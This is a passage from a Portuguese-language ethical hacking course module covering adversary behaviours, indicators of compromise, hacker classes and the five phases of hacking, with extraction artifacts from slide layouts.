descobrir informações como contexto do usuário local e configuração do sistema, nome do host, endereços IP,
sistemas remotos ativos e programas em execução nos sistemas de destino. Os profissionais de segurança
podem monitorar as atividades de um adversário verificando comandos incomuns executados nos scripts
Batch e PowerShell e usando ferramentas de captura de pacotes.
ÿ Utilização do PowerShell
O PowerShell pode ser usado por um adversário como uma ferramenta para automatizar a exfiltração de
dados e lançar novos ataques. Para identificar o uso indevido do PowerShell na rede, os profissionais de
segurança podem verificar os logs de transcrição do PowerShell ou os logs de eventos do Windows. A string
do agente do usuário e os endereços IP também podem ser usados para identificar hosts mal-intencionados
que tentam exfiltrar dados.


ÿ Actividades de Procuração Não Especificadas
Um adversário pode criar e configurar vários domínios apontando para o mesmo host, permitindo assim que um adversário
alterne rapidamente entre os domínios para evitar a detecção.
Os profissionais de segurança podem localizar domínios não especificados verificando os feeds de dados gerados por esses
domínios. Usando este feed de dados, os profissionais de segurança também podem encontrar quaisquer arquivos maliciosos
baixados e a comunicação não solicitada com a rede externa com base nos domínios.
ÿ Uso da Interface de Linha de Comando
Ao obter acesso ao sistema de destino, um adversário pode usar a interface de linha de comando para interagir com o sistema
de destino, navegar pelos arquivos, ler o conteúdo do arquivo, modificar o conteúdo do arquivo, criar novas contas, conectar-se
ao sistema remoto e baixar e instalar código malicioso. Os profissionais de segurança podem identificar esse comportamento
de um adversário verificando os logs em busca de ID de processo, processos com letras e números arbitrários e arquivos
maliciosos baixados da Internet.
ÿ Agente de Usuário HTTP
Na comunicação baseada em HTTP, o servidor identifica o cliente HTTP conectado usando o campo de agente do usuário. Um
adversário modifica o conteúdo do campo do agente do usuário HTTP para se comunicar com o sistema comprometido e
realizar outros ataques. Portanto, os profissionais de segurança podem identificar esse ataque em um estágio inicial, verificando
o conteúdo do campo do agente do usuário.
ÿ Servidor de Comando e Controle
Os adversários usam servidores de comando e controle para se comunicar remotamente com sistemas comprometidos por
meio de uma sessão criptografada. Usando esse canal criptografado, o adversário pode roubar dados, excluir dados e lançar
novos ataques. Os profissionais de segurança podem detectar hosts ou redes comprometidos identificando a presença de um
servidor de comando e controle rastreando o tráfego de rede para tentativas de conexão de saída, portas abertas indesejadas
e outras anomalias.
ÿ Utilização de Tunelamento de DNS
Os adversários usam o túnel DNS para ofuscar o tráfego malicioso no tráfego legítimo transportado por protocolos comuns
usados na rede. Usando o túnel DNS, um adversário também pode se comunicar com o servidor de comando e controle, ignorar
os controles de segurança e executar a exfiltração de dados. Os profissionais de segurança podem identificar o túnel de DNS
analisando solicitações de DNS maliciosas, carga de DNS, domínios não especificados e o destino das solicitações de DNS.
ÿ Utilização de Web Shell
Um adversário usa um shell da web para manipular o servidor da web criando um shell dentro de um site; permite que um
adversário obtenha acesso remoto às funcionalidades de um servidor.
Usando um shell da web, um adversário executa várias tarefas, como exfiltração de dados, transferências de arquivos e uploads
de arquivos. Os profissionais de segurança podem identificar o shell da web em execução


a rede analisando o acesso ao servidor, logs de erro, strings suspeitas que indicam codificação, strings de agente do
usuário e por meio de outros métodos.
ÿ Estadiamento de Dados
Após a penetração bem-sucedida na rede de um alvo, o adversário usa técnicas de preparação de dados para coletar e
combinar o máximo de dados possível. Os tipos de dados coletados por um adversário incluem dados confidenciais
sobre funcionários e clientes, táticas de negócios de uma organização, informações financeiras e informações de
infraestrutura de rede. Depois de coletados, o adversário pode exfiltrar ou destruir os dados.
Os profissionais de segurança podem detectar a preparação de dados monitorando o tráfego de rede para transferências
de arquivos maliciosos, monitoramento de integridade de arquivos e logs de eventos.


Indicadores de compromisso
(IoCs)
Indicators of Compromise (IoCs) são as pistas, artefatos e dados

forenses encontrados na rede ou sistema operacional de uma organização
01 que indicam uma possível invasão ou atividade maliciosa na infraestrutura

da organização
Os IoCs atuam como uma boa fonte de informações sobre as
02 ameaças que servem como pontos de dados na inteligência

processar
Os profissionais de segurança precisam realizar monitoramento
03 contínuo de IoCs para detectar e responder de forma eficaz e eficiente

às ameaças cibernéticas em evolução
Indicadores de comprometimento (IoCs)
As ameaças cibernéticas estão evoluindo continuamente com os TTPs mais recentes adaptados com base nas
vulnerabilidades da organização-alvo. Os profissionais de segurança devem realizar monitoramento contínuo de
IoCs para detectar e responder de forma eficaz e eficiente às ameaças cibernéticas em evolução.
Indicadores de comprometimento são pistas, artefatos e dados forenses encontrados em uma rede ou sistema
operacional de uma organização que indicam uma possível invasão ou atividade maliciosa na infraestrutura da
organização.
No entanto, IoCs não são inteligência; em vez disso, os IoCs atuam como uma boa fonte de informações sobre
ameaças que servem como pontos de dados no processo de inteligência. A inteligência de ameaças acionável
extraída de IoCs ajuda as organizações a aprimorar as estratégias de tratamento de incidentes. Os profissionais
de segurança cibernética usam várias ferramentas automatizadas para monitorar IoCs para detectar e prevenir
várias violações de segurança na organização. O monitoramento de IoCs também ajuda as equipes de segurança
a aprimorar os controles e políticas de segurança da organização para detectar e bloquear o tráfego suspeito
para impedir novos ataques. Para superar as ameaças associadas aos IoCs, algumas organizações como STIX
e TAXII desenvolveram relatórios padronizados que contêm dados condensados relacionados a ataques e os
compartilharam com outras pessoas para alavancar a resposta a incidentes.
Um IoC é um indicador atômico, indicador computado ou indicador comportamental. São as informações sobre
atividades suspeitas ou maliciosas que são coletadas de vários estabelecimentos de segurança na infraestrutura
de uma rede. Indicadores atômicos são aqueles que não podem ser
segmentado em partes menores, e cujo significado não é alterado no contexto de uma intrusão.
Exemplos de indicadores atômicos são endereços IP e endereços de e-mail. Os indicadores calculados são
obtidos a partir dos dados extraídos de um incidente de segurança. Exemplos de indicadores computados são
valores de hash e expressões regulares. Os indicadores comportamentais referem-se a um agrupamento de
indicadores atômicos e computados, combinados com base em alguma lógica.


Categorias de indicadores de compromisso

Entender os IoCs ajuda os profissionais de segurança a detectar rapidamente as ameaças contra a
organização e protegê-la contra ameaças em evolução
Para isso, os IoCs são divididos em quatro categorias:
Indicadores de e-mail Indicadores de rede Indicadores baseados em host Indicadores Comportamentais
ÿ Usado para enviar mensagens maliciosas ÿ Útil para comando e ÿ Encontrado realizando uma ÿ Usado para identificar
dados para a controle, distribuição de análise do sistema infectado comportamentos específicos
organização de destino ou indivíduo malware, identificação do dentro da rede organizacional relacionados a atividades maliciosas
sistema operacional e outras tarefas

ÿ Exemplos incluem o ÿ Exemplos incluem documento
endereço de e-mail do ÿ Exemplos incluem URLs, ÿ Os exemplos incluem nomes de arquivo, executando script do PowerShell
remetente, assunto do e- nomes de domínio e hashes de arquivo, chaves de registro, e execução de comando remoto
mail e anexos ou links endereços IP DLLs e mutex
Categorias de indicadores de compromisso
Os profissionais de segurança cibernética devem ter conhecimento adequado sobre vários possíveis atores de ameaças e
suas táticas relacionadas a ameaças cibernéticas, principalmente chamadas de Indicadores de Comprometimento (IoCs).
Essa compreensão dos IoCs ajuda os profissionais de segurança a detectar rapidamente as ameaças que entram na
organização e a protegê-la contra ameaças em evolução. Para isso, os IoCs são divididos em quatro categorias:
ÿ Indicadores de e-mail
Os invasores geralmente preferem serviços de e-mail para enviar dados mal-intencionados à organização ou
indivíduo alvo. Esses e-mails de engenharia social são preferidos devido à sua facilidade de uso e anonimato
comparativo. Exemplos de indicadores de e-mail incluem o endereço de e-mail do remetente, assunto do e-mail
e anexos ou links.
ÿ Indicadores de Rede
Os indicadores de rede são úteis para comando e controle, entrega de malware e detalhes de identificação sobre
o sistema operacional, tipo de navegador e outras informações específicas do computador. Exemplos de
indicadores de rede incluem URLs, nomes de domínio e endereços IP.
ÿ Indicadores Baseados em Host
Os indicadores baseados em host são encontrados realizando uma análise do sistema infectado dentro da rede
organizacional. Exemplos de indicadores baseados em host incluem nomes de arquivo, hashes de arquivo,
chaves de registro, DLLs e mutex.


ÿ Indicadores Comportamentais
Geralmente, os IoCs típicos são úteis para identificar indicações de invasão, como endereços IP maliciosos,
assinaturas de vírus, hash MD5 e nomes de domínio. IoCs comportamentais são usados para identificar
comportamentos específicos relacionados a atividades maliciosas, como injeção de código na memória ou execução
de scripts de um aplicativo. Comportamentos bem definidos permitem ampla proteção para bloquear todas as
atividades maliciosas atuais e futuras.
Esses indicadores são úteis para identificar quando serviços de sistema legítimos são usados para atividades anormais
ou inesperadas. Exemplos de indicadores comportamentais incluem documento executando script do PowerShell e
execução de comando remoto.
Listados abaixo estão alguns dos principais indicadores de comprometimento (IoCs):
ÿ Tráfego de rede de saída incomum
ÿ Atividade incomum através de uma conta de usuário privilegiada
ÿ Arquivos e softwares ilegítimos
ÿ Anomalias geográficas
ÿ Múltiplas falhas de login
ÿ Aumento do volume de leitura do banco de dados
ÿ Grande tamanho de resposta HTML
ÿ Múltiplos pedidos para o mesmo arquivo
ÿ Tráfego de aplicativo de porta incompatível
ÿ Uso incomum de portas e protocolos
ÿ Alterações suspeitas no registro ou no arquivo do sistema
ÿ Solicitações incomuns de DNS
ÿ E-mails maliciosos
ÿ Correções inesperadas de sistemas
ÿ Sinais de atividade de negação de serviço distribuído (DDoS)
ÿ Interrupção do serviço e desfiguração
ÿ Pacotes de dados nos lugares errados
ÿ Tráfego web com comportamento sobre-humano
ÿ Um aumento drástico no uso de largura de banda
ÿ Hardware malicioso


Fluxo do módulo
3

Ético
Conceitos, Escopo e

Discutir conceitos de hacking e classes de hackers

Você precisa aprender os conceitos básicos de hacking para entender a perspectiva do invasor nas
tentativas de hacking. Esta seção ajuda você a entender o comportamento de um hacker. Esta seção
trata dos conceitos básicos de hacking: o que é hacking, quem é um hacker e as diferentes classes
de hackers.


O que é Hackear?
Hacking refere-se a explorar Envolve a modificação O hacking pode ser usado

vulnerabilidades do sistema e de recursos do sistema para roubar e redistribuir
comprometer os controles de ou do aplicativo para atingir propriedade intelectual,
segurança para obter acesso não um objetivo fora do propósito levando à perda de negócios
autorizado ou inapropriado aos original do criador
recursos de um sistema
O que é Hackear?
Hacking no campo da segurança de computadores refere-se à exploração de vulnerabilidades do sistema e

comprometimento dos controles de segurança para obter acesso não autorizado ou inapropriado aos
recursos do sistema. Envolve a modificação de recursos do sistema ou do aplicativo para atingir um objetivo
fora do propósito original de seu criador. O hacking pode ser feito para roubar, furtar ou redistribuir
propriedade intelectual, levando assim à perda de negócios.
Hacking em redes de computadores geralmente é feito usando scripts ou outra programação de rede.
As técnicas de hacking de rede incluem a criação de vírus e worms, a execução de ataques de negação de
serviço (DoS), o estabelecimento de conexões de acesso remoto não autorizadas a um dispositivo usando
cavalos de Tróia ou backdoors, a criação de botnets, detecção de pacotes, phishing e quebra de senha. O
motivo por trás do hacking pode ser roubar informações ou serviços críticos, por emoção, desafio intelectual,
curiosidade, experimento, conhecimento, ganho financeiro, prestígio, poder, reconhecimento de colegas,
vingança e desejo de vingança, entre outros motivos.


Quem é um Hacker?
Um indivíduo inteligente com Para alguns hackers, hackear é um

excelentes habilidades em hobby para ver quantos
01 informática que pode criar e explorar 02 computadores ou redes eles podem
software e hardware de computador comprometer
As intenções de alguns hackers Alguns hackers com intenção maliciosa , como
podem ser obter conhecimento ou roubar dados comerciais, informações de cartão de

03 investigar e fazer coisas ilegais crédito, números de previdência social, senhas de e-
mail e outros dados confidenciais
Quem é um Hacker?
Um hacker é uma pessoa que invade um sistema ou rede sem autorização para destruir, roubar dados
confidenciais ou realizar ataques maliciosos. Um hacker é um indivíduo inteligente com excelentes
habilidades em informática, juntamente com a capacidade de criar e explorar o software e o hardware do
computador. Normalmente, um hacker é um engenheiro ou programador habilidoso com conhecimento
suficiente para descobrir vulnerabilidades em um sistema de destino. Eles geralmente têm experiência no
assunto e gostam de aprender os detalhes de várias linguagens de programação e sistemas de
computador. Embora invadir um sistema ou rede seja considerado uma habilidade técnica, gradualmente
foi definido como atividades maliciosas realizadas para obter acesso ilegal a sistemas ou redes.
Para alguns hackers, hackear é um hobby para ver quantos computadores ou redes eles podem
comprometer. Sua intenção pode ser obter conhecimento ou bisbilhotar para fazer coisas ilegais. Alguns
hackers com intenções maliciosas por trás de suas escapadas, como roubar dados comerciais, informações
de cartão de crédito, números de previdência social e senhas de e-mail.


Classes de hackers/agentes de ameaças
Suicídio Roteiro
chapéus pretos chapéus brancos Chapéus Cinzentos
hackers crianças
Indivíduos com Indivíduos que Indivíduos que Indivíduos que Um não qualificado
habilidades use seu trabalhar ambos visam derrubar hacker que

extraordinárias habilidades ofensivamente e o crítico compromete um
de computação; elas de hacker defensivamente em infraestrutura para sistema executando
recorrer a professadas para defesa vários momentos uma "causa" e scripts, ferramentas
malicioso ou propósitos e não estão preocupados e software que
destrutivo também são conhecidos sobre enfrentar
atividades e como analistas penas de prisão ou foram desenvolvidos
também são conhecidos de segurança qualquer outro tipo de por hackers reais
como bolachas punição
Classes de hackers/agentes de ameaças (continuação)
Indivíduos com uma ampla gama de habilidades que são motivados por crenças
Ciberterroristas religiosas ou políticas para criar o medo por meio da interrupção em larga escala das
redes de computadores
Indivíduos empregados pelo governo para penetrar e obter informações

Patrocinado pelo Estado
ultrassecretas e danificar os sistemas de informação de outros governos
hackers
Indivíduos que promovem uma agenda política por meio de hacking,

hacktivista
especialmente usando hacking para desfigurar ou desativar o site
Um consórcio de hackers habilidosos com seus próprios recursos e

Equipes de hackers financiamento. Eles trabalham juntos em sinergia para pesquisar as tecnologias de
ponta
Indivíduos que realizam espionagem corporativa espionando

Espiões Industriais ilegalmente organizações concorrentes e se concentram em roubar
informações, como projetos e fórmulas


Classes de hackers/agentes de ameaças (continuação)
Insider sindicatos criminosos Hackers Organizados

Qualquer funcionário (pessoa de confiança) Grupos de indivíduos envolvidos Malfeitores ou criminosos
que tenha acesso a ativos críticos de uma em atividades criminosas endurecidos que usam
organização. Eles usam acesso privilegiado organizadas, planejadas e prolongadas. dispositivos alugados ou botnets
para violar regras ou causar danos Eles desviam dinheiro ilegalmente para realizar vários ataques
intencionalmente ao sistema de informações realizando ataques cibernéticos cibernéticos para roubar dinheiro das vítimas
da organização sofisticados
Classes de hackers/agentes de ameaças
Os hackers geralmente se enquadram em uma das seguintes categorias, de acordo com suas atividades:
ÿ Black Hats: Black hats são indivíduos que usam suas extraordinárias habilidades de computação para fins ilegais
ou maliciosos. Esta categoria de hacker está frequentemente envolvida em atividades criminosas. Eles também
são conhecidos como biscoitos.
ÿ White Hats: White hats ou testadores de penetração são indivíduos que usam suas habilidades de hacking para
fins defensivos. Hoje em dia, quase todas as organizações têm analistas de segurança com conhecimento
sobre contramedidas de hackers, que podem proteger sua rede e sistemas de informação contra ataques mal-
intencionados. Eles têm permissão do proprietário do sistema.
ÿ Chapéus Cinzentos: Os chapéus cinzentos são os indivíduos que trabalham ofensivamente e defensivamente
em vários momentos. Os chapéus cinza podem ajudar os hackers a encontrar várias vulnerabilidades em um
sistema ou rede e, ao mesmo tempo, ajudar os fornecedores a melhorar os produtos (software ou hardware)
verificando as limitações e tornando-os mais seguros.
ÿ Hackers suicidas: Hackers suicidas são indivíduos que visam derrubar infraestrutura crítica por uma “causa” e
não estão preocupados em enfrentar penas de prisão ou qualquer outro tipo de punição. Os hackers suicidas
são semelhantes aos homens-bomba que sacrificam suas vidas por um ataque e, portanto, não estão
preocupados com as consequências de suas ações.
ÿ Script Kiddies: Script kiddies são hackers não qualificados que comprometem sistemas executando scripts,
ferramentas e software desenvolvidos por hackers reais. Eles geralmente se concentram na quantidade, e não
na qualidade, dos ataques que iniciam. Eles não têm um alvo ou objetivo específico ao realizar o ataque e
visam simplesmente ganhar popularidade ou provar suas habilidades técnicas.


ÿ Terroristas cibernéticos: Os terroristas cibernéticos são indivíduos com uma ampla gama de habilidades
que são motivados por crenças religiosas ou políticas para criar o medo de interrupção em larga escala
das redes de computadores.
ÿ Hackers patrocinados pelo Estado : Hackers patrocinados pelo Estado são indivíduos qualificados com
experiência em hacking e são empregados pelo governo para penetrar, obter informações ultrassecretas
e danificar os sistemas de informação de outras organizações governamentais ou militares. O principal
objetivo desses agentes de ameaças é detectar vulnerabilidades e explorar a infraestrutura de uma nação
e coletar inteligência ou informações confidenciais.
ÿ Hacktivista: Hacktivismo é uma forma de ativismo na qual hackers invadem sistemas de computador
corporativos ou governamentais como um ato de protesto. Os hacktivistas usam o hacking para aumentar
a conscientização sobre suas agendas sociais ou políticas, bem como para aumentar sua própria
reputação nas arenas online e offline. Eles promovem uma agenda política, especialmente usando
hacking para desfigurar ou desativar sites. Em alguns incidentes, os hacktivistas também podem obter e
revelar informações confidenciais ao público. Alvos hacktivistas comuns incluem agências governamentais,
instituições financeiras, corporações multinacionais e qualquer outra entidade que eles percebam como
uma ameaça. Independentemente das intenções dos hacktivistas, obter acesso não autorizado é crime.
ÿ Equipes de hackers: Uma equipe de hackers é um consórcio de hackers qualificados com seus próprios
recursos e financiamento. Eles trabalham juntos em sinergia para pesquisar tecnologias de ponta. Esses
agentes de ameaças também podem detectar vulnerabilidades, desenvolver ferramentas avançadas e
executar ataques com planejamento adequado.
ÿ Espiões Industriais: Espiões industriais são indivíduos que realizam espionagem corporativa espionando
ilegalmente organizações concorrentes. Eles se concentram em roubar informações críticas, como
projetos, fórmulas, designs de produtos e segredos comerciais. Esses agentes de ameaças usam
ameaças persistentes avançadas (APTs) para penetrar em uma rede e também podem permanecer
indetectáveis por anos. Em alguns casos, eles podem usar técnicas de engenharia social para roubar
informações confidenciais, como planos de desenvolvimento e estratégias de marketing da empresa-alvo,
o que pode resultar em perdas financeiras para essa empresa.
ÿ Insiders: Um insider é qualquer funcionário (pessoa de confiança) que tenha acesso a ativos críticos de
uma organização. Uma ameaça interna envolve o uso de acesso privilegiado para violar regras ou causar
danos intencionalmente às informações ou sistemas de informação da organização.
Os insiders podem ignorar facilmente as regras de segurança, corromper recursos valiosos e acessar
informações confidenciais. Geralmente, as ameaças internas surgem de funcionários insatisfeitos,
funcionários demitidos e funcionários mal treinados.
ÿ Sindicatos Criminosos: Os sindicatos criminosos são grupos de indivíduos ou comunidades que estão
envolvidos em atividades criminosas organizadas, planejadas e prolongadas. Eles exploram vítimas de
diferentes jurisdições na Internet, tornando-as difíceis de localizar. O principal objetivo desses agentes de
ameaças é desviar dinheiro ilegalmente, realizando ataques cibernéticos sofisticados e atividades de
lavagem de dinheiro.
ÿ Hackers Organizados: Hackers Organizados são um grupo de hackers trabalhando juntos em atividades
criminosas. Tais grupos são bem organizados em uma estrutura hierárquica que consiste


de dirigentes e trabalhadores. O grupo também pode ter várias camadas de gerenciamento. Esses
hackers são meliantes ou criminosos endurecidos que não usam seus próprios dispositivos; em vez
disso, eles usam dispositivos alugados ou botnets e serviços de crimeware para realizar vários
ataques cibernéticos para roubar dinheiro das vítimas e vender suas informações pelo lance mais alto.
Eles também podem fraudar propriedade intelectual, segredos comerciais e planos de marketing;
penetre secretamente na rede alvo; e permanecem indetectáveis por longos períodos.


Fluxo do módulo
3

Ético
Conceitos, Escopo e

Entenda as diferentes fases do ciclo de hacking

Atualmente, as organizações estão dando prioridade máxima à segurança cibernética, pois os ataques cibernéticos têm o
potencial de prejudicar o patrimônio ou a reputação de sua marca. Portanto, as organizações estão recrutando profissionais
de segurança cibernética para conter as ameaças em constante evolução de violações de segurança. É importante que
esses profissionais de segurança obtenham conhecimento sobre várias fases do hacking, o que os ajudará a analisar e
fortalecer a postura de segurança da organização contra várias ameaças cibernéticas. Esta seção discute as diferentes
fases do ciclo de hacking.
Fases de hacking
Em geral, existem cinco fases de hacking:
ÿ Reconhecimento
ÿ Escaneamento
ÿ Obtenção de Acesso
ÿ Manutenção do Acesso
ÿ Limpeza de Pistas


Fase de Hacking: Reconhecimento

ÿ Reconhecimento refere-se à fase preparatória
em que um atacante procura reunir
informações sobre um alvo antes de lançar um ataque
Tipos de reconhecimento
Reconhecimento Passivo Reconhecimento Ativo
ÿ Envolve a aquisição de informações ÿ Envolve a interação direta

sem interagir diretamente com com o alvo por qualquer meio
o alvo
ÿ Por exemplo, chamadas
ÿ Por exemplo, pesquisando registros telefônicas para o help desk ou
públicos ou comunicados de imprensa departamento técnico do alvo
Fase de Hacking: Reconhecimento

Reconhecimento refere-se à fase preparatória na qual um atacante reúne o máximo de informações
possível sobre o alvo antes de lançar o ataque. Nesta fase, o atacante recorre à inteligência competitiva
para aprender mais sobre o alvo. Pode ser o futuro ponto de retorno, conhecido pela facilidade de
entrada para um ataque quando mais informações sobre o alvo são conhecidas em larga escala. O
alcance do alvo de reconhecimento pode incluir os clientes, funcionários, operações, rede e sistemas
da organização alvo.
Esta fase permite que os invasores planejem o ataque. Pode levar algum tempo até que o invasor
reúna o máximo de informações possível. Parte desse reconhecimento pode envolver engenharia
social. Um engenheiro social é uma pessoa que convence as pessoas a revelarem informações como
números de telefone não listados, senhas e outras informações confidenciais. Por exemplo, o hacker
pode ligar para o provedor de serviços de Internet do alvo e, usando informações pessoais obtidas
anteriormente, convencer o representante de atendimento ao cliente de que o hacker é realmente o
alvo e, ao fazer isso, obter ainda mais informações sobre o alvo.
Outra técnica de reconhecimento é o mergulho no lixo. O mergulho no lixo é, simplesmente, procurar

no lixo de uma organização qualquer informação confidencial descartada. Os invasores podem usar a
Internet para obter informações como informações de contato dos funcionários, parceiros de negócios,
tecnologias atualmente em uso e outros conhecimentos críticos de negócios. O mergulho no lixo pode
até fornecer aos invasores informações ainda mais confidenciais, como nomes de usuário, senhas,
extratos de cartão de crédito, extratos bancários, recibos de caixas eletrônicos, números de CPF,
números de telefone particulares, números de contas correntes ou outros dados confidenciais.
Pesquisar o site da empresa-alvo no banco de dados Whois da Internet pode facilmente fornecer aos
hackers os endereços IP, nomes de domínio e informações de contato da empresa.


Tipos de reconhecimento
As técnicas de reconhecimento são amplamente categorizadas em ativas e passivas.
Quando um invasor está usando técnicas de reconhecimento passivo, ele não interage diretamente com o
alvo. Em vez disso, o invasor depende de informações disponíveis publicamente, comunicados de imprensa
ou outros métodos sem contato.
As técnicas de reconhecimento ativo, por outro lado, envolvem interações diretas com o sistema de destino
usando ferramentas para detectar portas abertas, hosts acessíveis, localizações de roteadores, mapeamento
de rede, detalhes de sistemas operacionais e aplicativos. Os invasores usam o reconhecimento ativo quando
há uma baixa probabilidade de detecção dessas atividades. Por exemplo, eles podem fazer ligações para o
help desk ou departamento técnico.
Como profissional de segurança, é importante ser capaz de distinguir entre os vários métodos de
reconhecimento e defender medidas preventivas à luz de ameaças potenciais.
As empresas, por sua vez, devem abordar a segurança como parte integrante de seus negócios e estratégias
operacionais e estar equipadas com políticas e procedimentos adequados para verificar possíveis
vulnerabilidades.


Fase de hacking: digitalização

Varredura refere-se à fase pré-ataque quando o invasor verifica a rede em busca de informações específicas com base nas informações coletadas
durante o reconhecimento
A varredura pode incluir o uso de discadores, scanners de porta, mapeadores de rede, ferramentas de ping e vulnerabilidade
scanners
Os invasores extraem informações como máquinas ativas, porta, status da porta, detalhes do sistema operacional, tipo de dispositivo e
tempo de atividade do sistema para iniciar o ataque
envia
Sondas TCP/IP
Digitalização em rede
Obtém rede
Processar em formação
Atacante Rede
Fase de hacking: digitalização
A varredura é a fase imediatamente anterior ao ataque. Aqui, o invasor usa os detalhes coletados durante o reconhecimento
para verificar a rede em busca de informações específicas. A varredura é uma extensão lógica do reconhecimento ativo e, de
fato, alguns especialistas não diferenciam a varredura do reconhecimento ativo. Há uma pequena diferença, no entanto, no
fato de que a varredura envolve uma investigação mais aprofundada por parte do invasor. Freqüentemente, as fases de
reconhecimento e varredura se sobrepõem e nem sempre é possível separar as duas. Um invasor pode coletar informações
críticas da rede, como o mapeamento de sistemas, roteadores e firewalls, usando ferramentas simples, como o utilitário
Traceroute padrão do Windows.
A varredura pode incluir o uso de discadores, scanners de porta, mapeadores de rede, ferramentas de ping, scanners de
vulnerabilidade ou outras ferramentas. Os invasores extraem informações como máquinas ativas, porta, status da porta,
detalhes do sistema operacional, tipo de dispositivo e tempo de atividade do sistema para iniciar um ataque.
Os scanners de porta detectam portas de escuta para encontrar informações sobre a natureza dos serviços em execução na
máquina de destino. A principal técnica de defesa contra scanners de porta é desligar os serviços que não são necessários e
implementar a filtragem de porta apropriada. No entanto, os invasores ainda podem usar ferramentas para determinar as
regras implementadas pela filtragem de porta.
As ferramentas mais usadas são os scanners de vulnerabilidade, que podem pesquisar milhares de vulnerabilidades
conhecidas em uma rede de destino. Isso dá uma vantagem ao invasor porque ele só precisa encontrar um único meio de
entrada, enquanto o profissional de sistemas precisa proteger o máximo de vulnerabilidade possível aplicando patches. As
organizações que usam sistemas de detecção de intrusão ainda precisam permanecer vigilantes porque os invasores podem
e usarão técnicas de evasão sempre que possível.


Figura 2.2: ilustração de digitalização em rede


Fase de hacking: obtendo acesso
01
Obter acesso refere-se ao ponto 03
O atacante pode escalar
em que o invasor obtém
acesso ao sistema operacional ou privilégios para
aplicativos no computador ou rede obter o controle completo
de destino do sistema
04
02 Os exemplos incluem quebra de
O invasor pode obter acesso no senha , estouro de buffer,
sistema operacional, negação de serviço e sequestro
aplicativo ou níveis de rede de sessão
Fase de hacking: obtendo acesso
Esta é a fase em que ocorre o hacking real. Os invasores usam vulnerabilidades identificadas durante as
fases de reconhecimento e verificação para obter acesso ao sistema e à rede de destino. Obter acesso
refere-se ao ponto em que o invasor obtém acesso ao sistema operacional ou aos aplicativos no computador
ou na rede. O invasor pode obter acesso ao sistema operacional, aplicativo ou nível de rede. Embora os
invasores possam causar muitos danos sem obter acesso ao sistema, o impacto do acesso não autorizado
é catastrófico. Por exemplo, ataques externos de negação de serviço podem esgotar recursos ou interromper
a execução de serviços no sistema de destino. O encerramento de processos pode interromper um serviço,
usando uma bomba lógica ou bomba-relógio, ou até mesmo reconfigurar e travar o sistema. Além disso, os
invasores podem esgotar os recursos do sistema e da rede consumindo todos os links de comunicação de
saída.
Os invasores obtêm acesso ao sistema de destino localmente (offline), por meio de uma LAN ou da Internet.
Os exemplos incluem quebra de senha, estouros de buffer baseados em pilha, negação de serviço e
seqüestro de sessão. Usando uma técnica chamada falsificação para explorar o sistema fingindo ser um
usuário legítimo ou um sistema diferente, os invasores podem enviar um pacote de dados contendo um bug
para o sistema de destino para explorar uma vulnerabilidade. A inundação de pacotes também interrompe
a disponibilidade de serviços essenciais. Os ataques Smurf tentam fazer com que os usuários em uma rede
inundem uns aos outros com dados, fazendo parecer que todos estão atacando uns aos outros e deixando o hacker
anônimo.
As chances de um hacker obter acesso a um sistema de destino dependem de vários fatores, como a
arquitetura e a configuração do sistema de destino, o nível de habilidade do perpetrador e o nível inicial de
acesso obtido. Depois que um invasor obtém acesso ao sistema de destino, ele tenta aumentar os privilégios
para assumir o controle total. No processo, eles também comprometem os sistemas intermediários que
estão conectados a ele.


Fase de hacking: mantendo o acesso
A manutenção do acesso refere-se à fase em que o invasor tenta

manter a propriedade do sistema 1
Os invasores podem impedir que o sistema seja propriedade de outros
invasores, garantindo seu acesso exclusivo com backdoors, rootkits
ou cavalos de Tróia
2
Os invasores podem fazer upload, download ou manipular
dados, aplicativos e configurações no sistema de propriedade 3
Os invasores usam o sistema comprometido para lançar novos ataques
4
Fase de hacking: mantendo o acesso
A manutenção do acesso refere-se à fase em que o invasor tenta manter a propriedade do sistema. Depois que um
invasor obtém acesso ao sistema de destino com privilégios de administrador ou de nível raiz (portanto, possuindo
o sistema), ele pode usar o sistema e seus recursos à vontade. O invasor pode usar o sistema como uma barra de
lançamento para escanear e explorar outros sistemas ou manter a discrição e continuar sua exploração. Ambas as
ações podem causar uma grande quantidade de dano. Por exemplo, o hacker pode implementar um sniffer para
capturar todo o tráfego de rede, incluindo sessões Telnet e FTP (protocolo de transferência de arquivos) com outros
sistemas e, em seguida, transmitir esses dados para onde quiser.
Os invasores que optam por não serem detectados removem as evidências de sua entrada e instalam um backdoor
ou um cavalo de Tróia para obter acesso repetido. Eles também podem instalar rootkits no nível do kernel para
obter acesso administrativo total ao computador de destino. Os rootkits obtêm acesso no nível do sistema
operacional, enquanto os cavalos de Tróia obtêm acesso no nível do aplicativo. Tanto os rootkits quanto os cavalos
de Tróia exigem que os usuários os instalem localmente. Nos sistemas Windows, a maioria dos cavalos de Tróia
se instala como um serviço e é executado como parte do sistema local com acesso administrativo.
Os invasores podem fazer upload, download ou manipular dados, aplicativos e configurações no sistema de
propriedade e também podem usar cavalos de Tróia para transferir nomes de usuário, senhas e qualquer outra
informação armazenada no sistema. Eles podem manter o controle sobre o sistema por um longo tempo fechando
as vulnerabilidades para impedir que outros hackers assumam o controle e, às vezes, no processo, fornecem algum
grau de proteção ao sistema contra outros ataques. Os invasores usam o sistema comprometido para lançar novos
ataques.


Fase de Hacking: Limpando Rastros
A limpeza de rastros refere-se às atividades realizadas por um invasor

01 para ocultar atos maliciosos
As intenções do invasor incluem obter acesso contínuo ao sistema

da vítima, permanecer despercebido e não ser capturado e excluir
02 evidências que possam levar ao seu processo
O invasor substitui os logs do servidor, do sistema e do

03 aplicativo para evitar suspeitas
Os atacantes sempre cobrem seus rastros para esconder sua identidade
Fase de Hacking: Limpando Rastros
Por motivos óbvios, como evitar problemas legais e manter o acesso, os invasores geralmente tentam
apagar todas as evidências de suas ações. A limpeza de rastros refere-se às atividades realizadas por
um invasor para ocultar atos maliciosos. As intenções do invasor incluem continuar acessando o sistema
da vítima, permanecendo despercebido e não capturado e excluindo evidências que possam levar ao seu
próprio processo. Eles usam utilitários como PsTools (https:// docs.microsoft.com), Netcat ou Trojans para
apagar suas pegadas dos arquivos de log do sistema. Depois que os cavalos de Tróia estiverem
instalados, o invasor provavelmente obterá o controle total do sistema e poderá executar scripts no cavalo
de Tróia ou rootkit para substituir o sistema crítico e os arquivos de log para ocultar sua presença no
sistema. Os atacantes sempre cobrem seus rastros para esconder sua identidade.
Outras técnicas incluem esteganografia e tunelamento. A esteganografia é o processo de esconder dados

em outros dados, por exemplo, em arquivos de imagem e som. O tunelamento tira proveito do protocolo
de transmissão transportando um protocolo sobre o outro. Os invasores podem usar até mesmo uma
